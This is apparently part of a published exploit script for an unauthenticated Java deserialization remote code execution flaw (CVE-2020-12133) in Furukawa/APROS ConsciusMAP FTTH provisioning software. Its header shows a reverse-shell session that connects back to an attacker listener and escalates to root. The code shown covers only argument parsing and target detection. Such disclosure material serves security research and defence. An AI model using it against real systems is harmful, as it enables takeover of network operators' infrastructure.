#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
#
#
# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
# Affected version: APROS Evolution | 2.8.1
# FURUKAWA | 2.7.10
# ConsciusMAP | 2.6.4
# | 2.3.1
# | 2.1.49
# | 2.1.36
# | 2.1.31
# | 2.1.18
# | 2.1.16
# | 2.1.15
# | 2.1.1
# | 2.0.1174
# | 1.8
# | 1.4.70
#
# Summary: Apros Evolution / Furukawa / ConsciusMap is the Tecnored
# provisioning system for FTTH networks. Complete administration of
# your entire external FTTH network plant, including from the ONUs
# installed in each end customer, to the wiring and junction boxes.
# Unify all the management of your FTTH network on a single platform.
# Unify all your data, whether from customers, your network, or the
# external plant in one place. APROS FTTH allows you to manage your
# entire FTTH network in a simple and globalized way with just one
# click, without being a network expert. Includes services such as:
# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
# QinQ for companies, and many more. General consumption graphics and
# per customer in real time. Captive Portal for cutting or suspension
# of the service.
#
# Desc: The FTTH provisioning solution suffers from an unauthenticated
# remote code execution vulnerability due to an unsafe deserialization
# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
# HTTP POST parameter. The deserialization can cause the vulnerable JSF
# web application to execute arbitrary Java functions, malicious Java
# bytecode, and system shell commands with root privileges.
#
# ===================================================================
# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
# [*] Setting up valid URL path
# [*] Starting callback listener child thread
# [*] Starting handler on port 4444
# [*] Sending serialized object
# [*] Connection from 172.16.0.1:48446
# [*] You got shell!
# tomcat7@zslab:/var/lib/tomcat7$ id
# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
# tomcat7@zslab:/var/lib/tomcat7$ sudo su
# id
# uid=0(root) gid=0(root) grupos=0(root)
# exit
# tomcat7@zslab:/var/lib/tomcat7$ exit
# *** Connection closed by remote host ***
# ===================================================================
#
# Tested on: Apache Tomcat/7.0.68
# Apache Tomcat/7.0.52
# Apache MyFaces/2.2.1
# Apache MyFaces/2.1.17
# Apache MyFaces/2.0.10
# GNU/Linux 4.4.0-173
# GNU/Linux 4.4.0-137
# GNU/Linux 4.4.0-101
# GNU/Linux 4.4.0-83
# GNU/Linux 3.15.0
# GNU/Linux 3.13.0-32
# PrimeFaces/4.0.RC1
# Apache-Coyote/1.1
# ACC Library 3.1
# Ubuntu 16.04.2
# Ubuntu 14.04.2
# Java/1.8.0_242
# Java/1.8.0_181
# Java/1.8.0_131
# Java/1.7.0_79
# MySQL 5.7.29
# MySQL 5.7.18
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5565
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
#
# CVE ID: CVE-2020-12133
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
#
#
# 24.02.2020
#
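def par(self):
    """Load the three command-line arguments into the instance.

    ``sys.argv`` must hold exactly three arguments after the program name:
    the target (``host[:port]`` or a full URL), the callback address and the
    local listener port.  With any other argument count ``self.usage()`` is
    called and no attribute is assigned.

    Sets ``self.target``, ``self.callback`` and ``self.lport`` (an ``int``).

    Raises:
        ValueError: if the port argument is not an integer (raised by
            ``int``).
    """
    if len(sys.argv) != 4:
        self.usage()
        return

    self.target = sys.argv[1]
    self.callback = sys.argv[2]
    self.lport = int(sys.argv[3])

    # Decide on the scheme by prefix rather than by substring: a bare host
    # such as "httpd01:8080" contains "http" but still has no scheme, and an
    # upper-case "HTTP://" prefix must not get a second scheme prepended.
    if not self.target.lower().startswith(("http://", "https://")):
        self.target = "http://{}".format(self.target)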
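def check(self):
    """Confirm the target serves the application and record its context path.

    Sends one GET to ``self.target`` and searches the response body for the
    product markers "FURUKAWA" and "APROS".  On a match ``self.path`` is set
    to "/FURUKAWA/" or "/APROS/"; "FURUKAWA" takes precedence when both
    appear.  If neither marker is present, or the request fails for any
    reason, a message is printed and the process exits with status 0.

    NOTE(review): this pre-check is a single unauthenticated GET of the base
    URL made before the ViewState POST described in the file header, so it
    would typically show up in the server's access log ahead of that POST.
    Only the body text is inspected; the HTTP status code is not checked.
    """
    print("[*] Setting up valid URL path")
    try:
        # requests applies no timeout by default; bound the wait so an
        # unresponsive host ends in the error path below instead of hanging.
        r = requests.get(self.target, timeout=10)
        app = r.text
        if "FURUKAWA" in app:
            self.path = "/FURUKAWA/"
        elif "APROS" in app:
            self.path = "/APROS/"
        else:
            # Neither marker found. A former trailing `exit(-1337)` branch
            # could never be reached and has been dropped.
            print("[!] App not detected.")
            # NOTE(review): status 0 is kept for compatibility, although it
            # makes this failure indistinguishable from success to a wrapper.
            sys.exit(0)
    except Exception as p:
        # SystemExit is not an Exception subclass, so the exit above passes
        # through; this handler only sees request/processing errors.
        print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
        sys.exit(0)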